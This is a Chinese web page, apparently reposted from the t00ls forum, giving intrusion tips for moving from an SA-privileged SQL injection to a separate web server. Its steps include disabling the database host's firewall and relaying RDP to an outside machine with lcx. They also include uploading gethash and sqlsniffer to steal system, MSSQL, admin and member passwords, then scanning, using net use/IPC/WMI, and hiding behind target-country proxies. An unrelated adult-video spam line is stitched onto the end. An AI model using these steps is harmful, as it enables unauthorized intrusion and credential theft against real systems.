• <nav id="y6oic"></nav>

    SA權限網站和數據庫分離的一些思路

    發表時間:2013-02-17

    當你碰到SA的注入點,可以執行命令,但是web與數據庫分離,你都會怎么做呢,當數據庫不服務器不能連接外網的時候,是不是只想著從web搞呢,這篇文章從t00ls轉載過來,希望對大家sa權限的注入點數據庫web分離提供一些滲透思路。

     
    SA點,system權限,可執行命令,web和db分離.DB機器不上網(一般指中馬不上線,lcx反彈不出)
     
    一、DB機有公網IP.
     
    1:執行命令把系統防火墻和ip策略停止,netstat -an找到3389端口嘗試連接.
     
    2:從內往外掃描.把命令行下的s掃描器轉成vbs傳上DB機器生成exe掃描外網一臺做了端口策略的機器.這臺外網機器開放所有端口.(可以到網上找這 樣的 機器.) 如果掃描結果有開放端口,證明在這臺DB機可以把3389轉到外面機器.比如掃到80 那就lcx -slave ip 80 127.0.0.1 3389.
     
    3:盡量多拿密碼.用vbs的方法上傳gethash,sqlsniffer類的工具.拿到系統和mssql的密 碼,數據庫表的后臺管理員密碼,member表的最前幾個用戶密碼.這些密碼可以用來測試web后臺,web的3389 ftp等.當然事先要對web機器完整掃描一遍. www.2cto.com
     
    4,nmap掃描.用nmap掃描web和db機器的1-65535端口.如果發現db機器顯示有closed的端口.那恭喜你,你可以lcx -tran 把3389轉發到該端口直接登陸.firewalk也有類似功能.但對代理防火墻無用.
     
    二、DB機只有內網IP
     
    1:盡量多拿密碼來net use到web機器.這個過程需要極大的耐心:) , 拿密碼嘗試登陸web后臺等.
     
    2:停掉防火墻和IP策略再從內往外掃描.
     
    3: ipconfig /dispalydns如果發現有公網的域名,極大可能是路由做了手腳.機會還是有的.
     
    4:學會密碼規律分析往往會有驚喜.
     
    5,在sa點里執行命令滲透內網,找可上網的機器.isql,ipc共享,wmi等
     
    有些地區或國家會禁止別的國家連接一些端口,所以擁有目標國代理或VPN是很重要的。

    成年视频在线观看免播放器